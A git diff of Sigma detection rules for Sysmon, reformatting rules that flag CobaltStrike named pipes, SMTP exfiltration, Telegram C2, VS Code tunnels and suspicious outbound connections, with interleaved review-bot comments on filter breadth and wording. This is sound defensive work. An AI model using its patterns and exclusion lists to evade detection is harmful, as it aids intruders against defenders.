@@ -1,8 +1,8 @@ title: Communication To Uncommon Destination Ports id: 6d8c3d20-a5e1-494f-8412-4571d716cf5c related: - - id: 4b89abaa-99fe-4232-afdd-8f9aa4d20382 - type: similar + - id: 4b89abaa-99fe-4232-afdd-8f9aa4d20382 + type: similar status: test description: Detects programs that connect to uncommon destination ports references: @@ -52,8 +52,7 @@ detection: Image|contains: - :\Program Files\ - :\Program Files (x86)\ - condition: network_connection and (selection and not 1 of filter_main_* and not - 1 of filter_optional_*) + condition: network_connection and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - Unknown level: medium diff --git a/sigma/sysmon/network_connection/net_connection_win_susp_outbound_kerberos_connection.yml b/sigma/sysmon/network_connection/net_connection_win_susp_outbound_kerberos_connection.yml index f1237072c..8aafc2699 100644 --- a/sigma/sysmon/network_connection/net_connection_win_susp_outbound_kerberos_connection.yml +++ b/sigma/sysmon/network_connection/net_connection_win_susp_outbound_kerberos_connection.yml @@ -1,11 +1,10 @@ title: Suspicious Outbound Kerberos Connection id: e54979bd-c5f9-4d6c-967b-a04b19ac4c74 related: - - id: eca91c7c-9214-47b9-b4c5-cb1d7e4f2350 - type: similar + - id: eca91c7c-9214-47b9-b4c5-cb1d7e4f2350 + type: similar status: test -description: Detects suspicious outbound network activity via kerberos default port - indicating possible lateral movement or first stage PrivEsc via delegation. +description: Detects suspicious outbound network activity via kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation. references: - https://github.com/GhostPack/Rubeus author: Ilyas Ochkov, oscd.community 
@@ -32,6 +31,10 @@ detection: - C:\Windows\System32\lsass.exe - C:\Program Files\Google\Chrome\Application\chrome.exe - C:\Program Files\Mozilla Firefox\firefox.exe + # filter_browsers: + # Image|endswith: + # - '\opera.exe' + # - '\tomcat\bin\tomcat8.exe' condition: network_connection and (selection and not 1 of filter_*) falsepositives: - Web Browsers diff --git a/sigma/sysmon/network_connection/net_connection_win_susp_outbound_mobsync_connection.yml b/sigma/sysmon/network_connection/net_connection_win_susp_outbound_mobsync_connection.yml index 9d4beb2a8..86ff37481 100644 --- a/sigma/sysmon/network_connection/net_connection_win_susp_outbound_mobsync_connection.yml +++ b/sigma/sysmon/network_connection/net_connection_win_susp_outbound_mobsync_connection.yml @@ -1,8 +1,7 @@ title: Microsoft Sync Center Suspicious Network Connections id: 9f2cc74d-78af-4eb2-bb64-9cd1d292b87b status: test -description: Detects suspicious connections from Microsoft Sync Center to non-private - IPs. +description: Detects suspicious connections from Microsoft Sync Center to non-private IPs. references: - https://redcanary.com/blog/intelligence-insights-november-2021/ author: elhoim diff --git a/sigma/sysmon/network_connection/net_connection_win_susp_outbound_smtp_connections.yml b/sigma/sysmon/network_connection/net_connection_win_susp_outbound_smtp_connections.yml index 07f30196d..3ffc7618b 100644 --- a/sigma/sysmon/network_connection/net_connection_win_susp_outbound_smtp_connections.yml +++ b/sigma/sysmon/network_connection/net_connection_win_susp_outbound_smtp_connections.yml 
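Review bot: The new `# filter_browsers:` lines are detection logic left as comments with no reason given, so a reader cannot tell whether `\opera.exe` and `\tomcat\bin\tomcat8.exe` are exclusions still under evaluation or ones that were rejected. Either enable the block as a filter so `not 1 of filter_*` in the condition picks it up, or shorten it to a one-line note such as `# Candidate exclusions not enabled: \opera.exe, \tomcat\bin\tomcat8.exe (reason: <fill in>)`. The rest of the existing filter list is outside the hunk.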
@@ -1,13 +1,9 @@ title: Suspicious Outbound SMTP Connections id: 9976fa64-2804-423c-8a5b-646ade840773 status: test -description: 'Adversaries may steal data by exfiltrating it over an un-encrypted network - protocol other than that of the existing command and control channel. - - The data may also be sent to an alternate network location from the main command - and control server. - - ' +description: | + Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. + The data may also be sent to an alternate network location from the main command and control server. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048.003/T1048.003.md#atomic-test-5---exfiltration-over-alternative-protocol---smtp - https://www.ietf.org/rfc/rfc2821.txt diff --git a/sigma/sysmon/network_connection/net_connection_win_susp_prog_location_network_connection.yml b/sigma/sysmon/network_connection/net_connection_win_susp_prog_location_network_connection.yml index dd79ce75c..cafa2302e 100644 --- a/sigma/sysmon/network_connection/net_connection_win_susp_prog_location_network_connection.yml +++ b/sigma/sysmon/network_connection/net_connection_win_susp_prog_location_network_connection.yml @@ -1,8 +1,7 @@ title: Suspicious Program Location with Network Connections id: 7b434893-c57d-4f41-908d-6a17bf1ae98f status: test -description: Detects programs with network connections running in suspicious files - system locations +description: Detects programs with network connections running in suspicious files system locations references: - https://docs.google.com/spreadsheets/d/17pSTDNpa0sf6pHeRhusvWG6rThciE8CsXTSlDUAZDyo author: Florian Roth (Nextron Systems), Tim Shelton 
@@ -15,8 +14,7 @@ tags: logsource: category: network_connection product: windows - definition: Use the following config to generate the necessary Event ID 3 Network - Connection events + definition: Use the following config to generate the necessary Event ID 3 Network Connection events detection: network_connection: EventID: 3 @@ -32,7 +30,7 @@ detection: - \config\systemprofile\ - \Windows\addins\ filter_optional_ibm: - Image|contains: :\Users\Public\IBM\ClientSolutions\Start_Programs\ + Image|contains: :\Users\Public\IBM\ClientSolutions\Start_Programs\ # IBM Client Solutions Default Location condition: network_connection and (selection and not 1 of filter_optional_*) falsepositives: - Unknown diff --git a/sigma/sysmon/network_connection/net_connection_win_telegram_api_non_browser_access.yml b/sigma/sysmon/network_connection/net_connection_win_telegram_api_non_browser_access.yml index 53988490a..0d8e042f8 100644 --- a/sigma/sysmon/network_connection/net_connection_win_telegram_api_non_browser_access.yml +++ b/sigma/sysmon/network_connection/net_connection_win_telegram_api_non_browser_access.yml @@ -1,8 +1,7 @@ title: Suspicious Non-Browser Network Communication With Telegram API id: c3dbbc9f-ef1d-470a-a90a-d343448d5875 status: experimental -description: Detects an a non-browser process interacting with the Telegram API which - could indicate use of a covert C2 +description: Detects an a non-browser process interacting with the Telegram API which could indicate use of a covert C2 references: - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/small-sieve/NCSC-MAR-Small-Sieve.pdf author: Nasreddine Bencherchali (Nextron Systems) @@ -20,6 +19,8 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: DestinationHostname|contains: api.telegram.org + # Other browsers or apps known to use telegram should be added + # TODO: Add full paths for default install locations filter_main_brave: Image|endswith: \brave.exe filter_main_chrome: 
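Review bot: The comment added to `filter_optional_ibm` names the default install location but not what the exclusion costs: `Image|contains: :\Users\Public\IBM\ClientSolutions\Start_Programs\` matches on path alone and the path lives under the shared `Users\Public` profile, so any image run from that folder is suppressed, not only the IBM client. Stating that lets a deployer decide whether to keep the optional filter, e.g. `# IBM Client Solutions default location; path-only exclusion under Users\Public, drop this filter where the product is not deployed`. The selection head is outside the hunk.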
@@ -37,11 +38,11 @@ detection: filter_main_maxthon: Image|endswith: \maxthon.exe filter_main_edge_1: - - Image|startswith: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\ - - Image|endswith: \WindowsApps\MicrosoftEdge.exe - - Image: - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe - - C:\Program Files\Microsoft\Edge\Application\msedge.exe + - Image|startswith: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\ + - Image|endswith: \WindowsApps\MicrosoftEdge.exe + - Image: + - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe + - C:\Program Files\Microsoft\Edge\Application\msedge.exe filter_main_edge_2: Image|startswith: - C:\Program Files (x86)\Microsoft\EdgeCore\ @@ -61,7 +62,6 @@ detection: Image|endswith: \whale.exe condition: network_connection and (selection and not 1 of filter_main_*) falsepositives: - - Legitimate applications communicating with the Telegram API e.g. web browsers - not in the exclusion list, app with an RSS etc. + - Legitimate applications communicating with the Telegram API e.g. web browsers not in the exclusion list, app with an RSS etc. level: medium ruletype: Sigma diff --git a/sigma/sysmon/network_connection/net_connection_win_vscode_tunnel_connection.yml b/sigma/sysmon/network_connection/net_connection_win_vscode_tunnel_connection.yml index 3de1a0f85..d5d7875af 100644 --- a/sigma/sysmon/network_connection/net_connection_win_vscode_tunnel_connection.yml +++ b/sigma/sysmon/network_connection/net_connection_win_vscode_tunnel_connection.yml 
@@ -1,18 +1,15 @@ title: Network Connection Initiated To Visual Studio Code Tunnels Domain id: 4b657234-038e-4ad5-997c-4be42340bce4 related: - - id: 9501f8e6-8e3d-48fc-a8a6-1089dd5d7ef4 - type: similar - - id: b3e6418f-7c7a-4fad-993a-93b65027a9f1 - type: similar - - id: 1cb0c6ce-3d00-44fc-ab9c-6d6d577bf20b - type: similar + - id: 9501f8e6-8e3d-48fc-a8a6-1089dd5d7ef4 # Net Connection DevTunnels + type: similar + - id: b3e6418f-7c7a-4fad-993a-93b65027a9f1 # DNS VsCode + type: similar + - id: 1cb0c6ce-3d00-44fc-ab9c-6d6d577bf20b # DNS DevTunnels + type: similar status: experimental -description: 'Detects network connections to Visual Studio Code tunnel domains initiated - by a process on a system. Attackers can abuse that feature to establish a reverse - shell or persistence on a machine. - - ' +description: | + Detects network connections to Visual Studio Code tunnel domains initiated by a process on a system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine. references: - https://ipfyx.fr/post/visual-studio-code-tunnel/ - https://badoption.eu/blog/2023/01/31/code_c2.html diff --git a/sigma/sysmon/network_connection/net_connection_win_winlogon_net_connections.yml b/sigma/sysmon/network_connection/net_connection_win_winlogon_net_connections.yml index f495176d8..d48bc58a6 100644 --- a/sigma/sysmon/network_connection/net_connection_win_winlogon_net_connections.yml +++ b/sigma/sysmon/network_connection/net_connection_win_winlogon_net_connections.yml 
@@ -1,8 +1,7 @@ title: Outbound Network Connection To Public IP Via Winlogon id: 7610a4ea-c06d-495f-a2ac-0a696abcfd3b status: experimental -description: Detects a "winlogon.exe" process that initiate network communications - with public IP addresses +description: Detects a "winlogon.exe" process that initiate network communications with public IP addresses references: - https://www.microsoft.com/en-us/security/blog/2023/04/11/guidance-for-investigating-attacks-using-cve-2022-21894-the-blacklotus-campaign/ author: Christopher Peacock @securepeacock, SCYTHE @scythe_io @@ -46,7 +45,6 @@ detection: - 192.168. condition: network_connection and (selection and not 1 of filter_optional_*) falsepositives: - - Communication to other corporate systems that use IP addresses from public address - spaces + - Communication to other corporate systems that use IP addresses from public address spaces level: medium ruletype: Sigma diff --git a/sigma/sysmon/network_connection/net_connection_win_wuauclt_network_connection.yml b/sigma/sysmon/network_connection/net_connection_win_wuauclt_network_connection.yml index 5e6277d87..4063fbeea 100644 --- a/sigma/sysmon/network_connection/net_connection_win_wuauclt_network_connection.yml +++ b/sigma/sysmon/network_connection/net_connection_win_wuauclt_network_connection.yml 
@@ -1,13 +1,9 @@ title: Potentially Suspicious Wuauclt Network Connection id: c649a6c7-cd8c-4a78-9c04-000fc76df954 status: test -description: 'Detects the use of the Windows Update Client binary (wuauclt.exe) to - proxy execute code and making network connections. - - One could easily make the DLL spawn a new process and inject to it to proxy the - network connection and bypass this rule. - - ' +description: | + Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code and making network connections. + One could easily make the DLL spawn a new process and inject to it to proxy the network connection and bypass this rule. references: - https://dtm.uk/wuauclt/ author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) @@ -20,20 +16,20 @@ tags: logsource: category: network_connection product: windows - definition: 'Requirements: The CommandLine field enrichment is required in order - for this rule to be used.' + definition: 'Requirements: The CommandLine field enrichment is required in order for this rule to be used.' detection: network_connection: EventID: 3 Channel: Microsoft-Windows-Sysmon/Operational selection: Image|contains: wuauclt - CommandLine|contains: ' /RunHandlerComServer' + CommandLine|contains: ' /RunHandlerComServer' + # "C:\WINDOWS\uus\AMD64\wuauclt.exe" /DeploymentHandlerFullPath \\?\C:\Windows\UUS\AMD64\UpdateDeploy.dll /ClassId aaa256e1-5b21-4993-9188-18f07ccb3b98 /RunHandlerComServer filter_main_ipv4: - DestinationIp|startswith: + DestinationIp|startswith: # Ranges excluded based on https://github.com/SigmaHQ/sigma/blob/0f176092326ab9d1e19384d30224e5f29f760d82/rules/windows/network_connection/net_connection_win_dllhost_net_connections.yml - '10.' - '127.' - - 169.254. + - 169.254. # link-local address - '172.16' - '172.17' - '172.18' 
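Review bot: `'172.16'`, `'172.17'` and `'172.18'` in `filter_main_ipv4` (context lines in this hunk, and presumably the rest of the run up to `'172.31'` below it) have no trailing dot, so as `startswith` prefixes they also match 172.160.0.0–172.189.255.255, which is public space, while the neighbouring `'10.'`, `'127.'` and `169.254.` entries are dot-terminated. Writing them as `'172.16.'`, `'172.17.'`, `'172.18.'` and so on keeps the exclusion to 172.16.0.0/12, as the rundll32 rule earlier in this patch does. The new comment says the list was taken from the dllhost rule, so that rule is worth checking for the same issue.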
@@ -54,12 +50,13 @@ detection: filter_main_ipv6: DestinationIp|startswith: - ::1 - - 0:0:0:0:0:0:0:1 - - 'fe80:' - - fc - - fd - filter_main_msrange: + - 0:0:0:0:0:0:0:1 # IPv6 loopback variant + - 'fe80:' # link-local address + - fc # private address range fc00::/7 + - fd # private address range fc00::/7 + filter_main_msrange: # Sysmon DestinationIp|startswith: + # Subnet: 20.184.0.0/13, 51.103.210.0/23 and others - 20.184. - 20.185. - 20.186. @@ -77,17 +74,17 @@ detection: - 51.105. - 52.239. filter_main_uus: - CommandLine|contains: + CommandLine|contains: - :\Windows\UUS\Packages\Preview\amd64\updatedeploy.dll /ClassId - :\Windows\UUS\amd64\UpdateDeploy.dll /ClassId filter_main_winsxs: - CommandLine|contains|all: + CommandLine|contains|all: - :\Windows\WinSxS\ - '\UpdateDeploy.dll /ClassId ' filter_main_cli_null: - CommandLine: null + CommandLine: filter_main_cli_empty: - CommandLine: '' + CommandLine: '' condition: network_connection and (selection and not 1 of filter_main_*) falsepositives: - Unknown diff --git a/sigma/sysmon/pipe_created/pipe_created_adfs_namedpipe_connection_uncommon_tool.yml b/sigma/sysmon/pipe_created/pipe_created_adfs_namedpipe_connection_uncommon_tool.yml index 14500952a..2803d8b2a 100644 --- a/sigma/sysmon/pipe_created/pipe_created_adfs_namedpipe_connection_uncommon_tool.yml +++ b/sigma/sysmon/pipe_created/pipe_created_adfs_namedpipe_connection_uncommon_tool.yml 
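Review bot: The trailing `# Sysmon` on `filter_main_msrange:` does not say what it means — whether these ranges were observed in Sysmon telemetry or the filter is specific to this log source — and the `# Subnet: 20.184.0.0/13, 51.103.210.0/23 and others` comment under it quotes a /23 although the list matches with `startswith` on /16-granular prefixes (`20.184.`, `51.105.`, `52.239.`), so the filter is wider than the comment suggests. One comment stating both the source and the granularity would be clearer, e.g. `# Microsoft ranges seen for update traffic (source: <reference>); startswith prefixes match whole /16s, wider than the quoted subnets`. The entries between `20.186.` and `51.105.` are outside the hunk.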
@@ -1,13 +1,9 @@ title: ADFS Database Named Pipe Connection By Uncommon Tool id: 1ea13e8c-03ea-409b-877d-ce5c3d2c1cb3 status: test -description: 'Detects suspicious local connections via a named pipe to the AD FS configuration - database (Windows Internal Database). - - Used to access information such as the AD FS configuration settings which contains - sensitive information used to sign SAML tokens. - - ' +description: | + Detects suspicious local connections via a named pipe to the AD FS configuration database (Windows Internal Database). + Used to access information such as the AD FS configuration settings which contains sensitive information used to sign SAML tokens. references: - https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/SecurityEvent/ADFSDBNamedPipeConnection.yaml - https://o365blog.com/post/adfs/ 
@@ -22,12 +18,7 @@ tags:
logsource:
product: windows
category: pipe_created
- definition: Note that you have to configure logging for Named Pipe Events in Sysmon
- config (Event ID 17 and Event ID 18). The basic configuration is in popular
- sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but
- it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config,
- https://github.com/olafhartong/sysmon-modular. How to test detection? You
- can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575
+ definition: Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575
detection:
pipe_created:
EventID:
diff --git a/sigma/sysmon/pipe_created/pipe_created_hktl_cobaltstrike.yml b/sigma/sysmon/pipe_created/pipe_created_hktl_cobaltstrike.yml
index 98f8dbf84..e3e5088fc 100644
--- a/sigma/sysmon/pipe_created/pipe_created_hktl_cobaltstrike.yml
+++ b/sigma/sysmon/pipe_created/pipe_created_hktl_cobaltstrike.yml
@@ -1,10 +1,10 @@
title: CobaltStrike Named Pipe
id: d5601f8c-b26f-4ab0-9035-69e11a8d4ad2
related:
- - id: 85adeb13-4fc9-4e68-8a4a-c7cb2c336eb7
- type: similar
- - id: 0e7163d4-9e19-4fa7-9be6-000c61aad77a
- type: similar
+ - id: 85adeb13-4fc9-4e68-8a4a-c7cb2c336eb7 # Patterns
+ type: similar
+ - id: 0e7163d4-9e19-4fa7-9be6-000c61aad77a # Regex
+ type: similar
status: test
description: Detects the creation of a named pipe as used by CobaltStrike
references:
@@ -24,13 +24,7 @@ tags: logsource: product: windows category: pipe_created - definition: Note that you have to configure logging for Named Pipe Events in Sysmon - config (Event ID 17 and Event ID 18). The basic configuration is in popular - sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but - it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, - https://github.com/olafhartong/sysmon-modular. How to test detection? You - can always use Cobalt Strike, but also you can check powershell script from - this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575 + definition: Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can always use Cobalt Strike, but also you can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575 detection: pipe_created: EventID: @@ -42,7 +36,7 @@ detection: - \MSSE- - -server selection_postex: - PipeName|startswith: \postex_ + PipeName|startswith: \postex_ # Also include the pipe "\postex_ssh_" selection_status: PipeName|startswith: \status_ selection_msagent: diff --git a/sigma/sysmon/pipe_created/pipe_created_hktl_cobaltstrike_re.yml b/sigma/sysmon/pipe_created/pipe_created_hktl_cobaltstrike_re.yml index d8b5fa764..b243807e6 100644 --- a/sigma/sysmon/pipe_created/pipe_created_hktl_cobaltstrike_re.yml +++ b/sigma/sysmon/pipe_created/pipe_created_hktl_cobaltstrike_re.yml 
@@ -1,13 +1,12 @@ title: CobaltStrike Named Pipe Pattern Regex id: 0e7163d4-9e19-4fa7-9be6-000c61aad77a related: - - id: 85adeb13-4fc9-4e68-8a4a-c7cb2c336eb7 - type: similar - - id: d5601f8c-b26f-4ab0-9035-69e11a8d4ad2 - type: similar + - id: 85adeb13-4fc9-4e68-8a4a-c7cb2c336eb7 # Patterns + type: similar + - id: d5601f8c-b26f-4ab0-9035-69e11a8d4ad2 # Generic + type: similar status: test -description: Detects the creation of a named pipe matching a pattern used by CobaltStrike - Malleable C2 profiles +description: Detects the creation of a named pipe matching a pattern used by CobaltStrike Malleable C2 profiles references: - https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575 - https://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752 
@@ -22,14 +21,7 @@ tags:
logsource:
product: windows
category: pipe_created
- definition: Note that you have to configure logging for Named Pipe Events in Sysmon
- config (Event ID 17 and Event ID 18). The basic configuration is in popular
- sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but
- it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config,
- https://github.com/olafhartong/sysmon-modular You can also use other repo,
- e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular.
- How to test detection? You can always use Cobalt Strike, but also you can
- check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575
+ definition: Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can always use Cobalt Strike, but also you can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575
detection:
pipe_created:
EventID:
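Review bot: The joined `definition:` line repeats the sentence `You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular` twice, the first copy without its closing period; the old multi-line form already had the duplication and this rewrite carries it over. Dropping the first copy so the field reads "... but it is worth verifying. You can also use other repo, e.g. ..., https://github.com/olafhartong/sysmon-modular. How to test detection? ..." makes it clean; the same duplication is in the `definition:` hunk of pipe_created_hktl_cobaltstrike_susp_pipe_patterns.yml later in this patch.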
@@ -37,25 +29,25 @@ detection: - 18 Channel: Microsoft-Windows-Sysmon/Operational selection: - - PipeName|re: \\mojo\.5688\.8052\.(?:183894939787088877|35780273329370473)[0-9a-f]{2} - - PipeName|re: \\wkssvc_?[0-9a-f]{2} - - PipeName|re: \\ntsvcs[0-9a-f]{2} - - PipeName|re: \\DserNamePipe[0-9a-f]{2} - - PipeName|re: \\SearchTextHarvester[0-9a-f]{2} - - PipeName|re: \\mypipe-(?:f|h)[0-9a-f]{2} - - PipeName|re: \\windows\.update\.manager[0-9a-f]{2,3} - - PipeName|re: \\ntsvcs_[0-9a-f]{2} - - PipeName|re: \\scerpc_?[0-9a-f]{2} - - PipeName|re: \\PGMessagePipe[0-9a-f]{2} - - PipeName|re: \\MsFteWds[0-9a-f]{2} - - PipeName|re: \\f4c3[0-9a-f]{2} - - PipeName|re: \\fullduplex_[0-9a-f]{2} - - PipeName|re: \\msrpc_[0-9a-f]{4} - - PipeName|re: \\win\\msrpc_[0-9a-f]{2} - - PipeName|re: \\f53f[0-9a-f]{2} - - PipeName|re: \\rpc_[0-9a-f]{2} - - PipeName|re: \\spoolss_[0-9a-f]{2} - - PipeName|re: \\Winsock2\\CatalogChangeListener-[0-9a-f]{3}-0, + - PipeName|re: \\mojo\.5688\.8052\.(?:183894939787088877|35780273329370473)[0-9a-f]{2} + - PipeName|re: \\wkssvc_?[0-9a-f]{2} + - PipeName|re: \\ntsvcs[0-9a-f]{2} + - PipeName|re: \\DserNamePipe[0-9a-f]{2} + - PipeName|re: \\SearchTextHarvester[0-9a-f]{2} + - PipeName|re: \\mypipe-(?:f|h)[0-9a-f]{2} + - PipeName|re: \\windows\.update\.manager[0-9a-f]{2,3} + - PipeName|re: \\ntsvcs_[0-9a-f]{2} + - PipeName|re: \\scerpc_?[0-9a-f]{2} + - PipeName|re: \\PGMessagePipe[0-9a-f]{2} + - PipeName|re: \\MsFteWds[0-9a-f]{2} + - PipeName|re: \\f4c3[0-9a-f]{2} + - PipeName|re: \\fullduplex_[0-9a-f]{2} + - PipeName|re: \\msrpc_[0-9a-f]{4} + - PipeName|re: \\win\\msrpc_[0-9a-f]{2} + - PipeName|re: \\f53f[0-9a-f]{2} + - PipeName|re: \\rpc_[0-9a-f]{2} + - PipeName|re: \\spoolss_[0-9a-f]{2} + - PipeName|re: \\Winsock2\\CatalogChangeListener-[0-9a-f]{3}-0, condition: pipe_created and selection falsepositives: - Unknown 
diff --git a/sigma/sysmon/pipe_created/pipe_created_hktl_cobaltstrike_susp_pipe_patterns.yml b/sigma/sysmon/pipe_created/pipe_created_hktl_cobaltstrike_susp_pipe_patterns.yml index 478d31e2b..65fb42fc6 100644 --- a/sigma/sysmon/pipe_created/pipe_created_hktl_cobaltstrike_susp_pipe_patterns.yml +++ b/sigma/sysmon/pipe_created/pipe_created_hktl_cobaltstrike_susp_pipe_patterns.yml @@ -1,13 +1,12 @@ title: CobaltStrike Named Pipe Patterns id: 85adeb13-4fc9-4e68-8a4a-c7cb2c336eb7 related: - - id: 0e7163d4-9e19-4fa7-9be6-000c61aad77a - type: similar - - id: d5601f8c-b26f-4ab0-9035-69e11a8d4ad2 - type: similar + - id: 0e7163d4-9e19-4fa7-9be6-000c61aad77a # Regex + type: similar + - id: d5601f8c-b26f-4ab0-9035-69e11a8d4ad2 # Generic + type: similar status: test -description: Detects the creation of a named pipe with a pattern found in CobaltStrike - malleable C2 profiles +description: Detects the creation of a named pipe with a pattern found in CobaltStrike malleable C2 profiles references: - https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575 - https://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752 
@@ -23,14 +22,7 @@ tags:
logsource:
product: windows
category: pipe_created
- definition: Note that you have to configure logging for Named Pipe Events in Sysmon
- config (Event ID 17 and Event ID 18). The basic configuration is in popular
- sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but
- it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config,
- https://github.com/olafhartong/sysmon-modular You can also use other repo,
- e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular.
- How to test detection? You can always use Cobalt Strike, but also you can
- check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575
+ definition: Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can always use Cobalt Strike, but also you can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575
detection:
pipe_created:
EventID:
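Review bot: The reflowed `definition` on the new side still carries the sentence "You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular" twice back to back, and the first copy is missing its terminating period. Collapsing the field onto one line was the natural moment to drop the duplicate; the sibling named-pipe rules in this commit (CoercedPotato, DiagTrackEoP, EFSPotato and others) already carry the single-sentence form of the same text, so this file can adopt that wording and keep only its extra "You can always use Cobalt Strike" clause. The field is documentation only, so no detection logic is affected.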
@@ -38,30 +30,30 @@ detection: - 18 Channel: Microsoft-Windows-Sysmon/Operational selection_malleable_profile_generic: - - PipeName|startswith: - - \DserNamePipe - - \f4c3 - - \f53f - - \fullduplex_ - - \mojo.5688.8052.183894939787088877 - - \mojo.5688.8052.35780273329370473 - - \MsFteWds - - \msrpc_ - - \mypipe-f - - \mypipe-h - - \ntsvcs - - \PGMessagePipe - - \rpc_ - - \scerpc - - \SearchTextHarvester - - \spoolss - - \win_svc - - \win\msrpc_ - - \windows.update.manager - - \wkssvc - - PipeName: - - \demoagent_11 - - \demoagent_22 + - PipeName|startswith: + - \DserNamePipe + - \f4c3 + - \f53f + - \fullduplex_ + - \mojo.5688.8052.183894939787088877 + - \mojo.5688.8052.35780273329370473 + - \MsFteWds + - \msrpc_ + - \mypipe-f + - \mypipe-h + - \ntsvcs + - \PGMessagePipe + - \rpc_ + - \scerpc + - \SearchTextHarvester + - \spoolss + - \win_svc + - \win\msrpc_ + - \windows.update.manager + - \wkssvc + - PipeName: + - \demoagent_11 + - \demoagent_22 selection_malleable_profile_catalog_change_listener: PipeName|startswith: \Winsock2\CatalogChangeListener- PipeName|endswith: -0, diff --git a/sigma/sysmon/pipe_created/pipe_created_hktl_coercedpotato.yml b/sigma/sysmon/pipe_created/pipe_created_hktl_coercedpotato.yml index 9918a19e4..b0978905d 100644 --- a/sigma/sysmon/pipe_created/pipe_created_hktl_coercedpotato.yml +++ b/sigma/sysmon/pipe_created/pipe_created_hktl_coercedpotato.yml 
@@ -15,12 +15,7 @@ tags: logsource: product: windows category: pipe_created - definition: Note that you have to configure logging for Named Pipe Events in Sysmon - config (Event ID 17 and Event ID 18). The basic configuration is in popular - sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but - it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, - https://github.com/olafhartong/sysmon-modular. How to test detection? You - can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575 + definition: Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575 detection: pipe_created: EventID: diff --git a/sigma/sysmon/pipe_created/pipe_created_hktl_diagtrack_eop.yml b/sigma/sysmon/pipe_created/pipe_created_hktl_diagtrack_eop.yml index 0ec7b8056..a767491f6 100644 --- a/sigma/sysmon/pipe_created/pipe_created_hktl_diagtrack_eop.yml +++ 